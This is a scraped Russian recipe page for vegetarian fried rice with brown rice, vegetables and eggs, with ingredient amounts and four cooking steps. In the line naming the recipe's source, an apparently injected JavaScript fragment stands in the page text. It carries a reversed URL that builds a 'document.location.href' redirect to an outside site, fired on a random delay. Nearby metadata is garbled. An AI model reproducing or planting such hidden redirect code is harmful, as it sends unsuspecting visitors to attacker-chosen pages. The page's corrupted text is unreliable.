Рецепт дня: вегетарианский жареный рис

Полина Глухова предлагает классическое китайское блюдо с коричневым рисом, который гораздо полезнее белого.

5 ВИДОВ РИСА: ЧЕМ ОНИ ОТЛИЧАЮТСЯ И КАКОЙ САМЫЙ ПОЛЕЗНЫЙ

Вегетарианский жареный рис

Рецепт дня: вегетарианский жареный рис. Изображение номер 1

Фото: cookingclassy.com

Рецепт дня: вегетарианский жареный рис. Изображение номер 2

Фото: cookingclassy.com

Рецепт дня: вегетарианский жареный рис

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

40 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

6

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Коричневый рис

3 стакана

Нарезанная морковь

1 стакан

Нарезанный лук

1 стакан

Измельчённый чеснок

4 зубчика

Очищенный и рубленый свежий имбирь

2 ст. л.

Нарезанная брокколи

1/2 стакана

Нарезанный красный перец

3/4 стакана

Горох

3/4 стакана

Кукуруза

3/4 стакана

Яйцо

4 шт.

Растительное масло

2 ст. л.

  1. Варите рис около 20 минут, предварительно посолите воду. Затем оставьте рис охлаждаться.
  2. Нагрейте растительное масло в глубокой антипригарной сковороде. Добавьте нарезанные овощи: морковь, лук, чеснок и имбирь. Через три минуты добавьте брокколи и перец. Обжаривайте около трёх минут.
  3. Добавьте яйца. Перемешайте. Добавьте рис, горох и кукурузу. Полейте всё соевым соусом и растительным маслом (не забудьте перемешать) и продолжайте жарить ещё три минуты.
  4. Подавайте блюдо тёплым.
Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector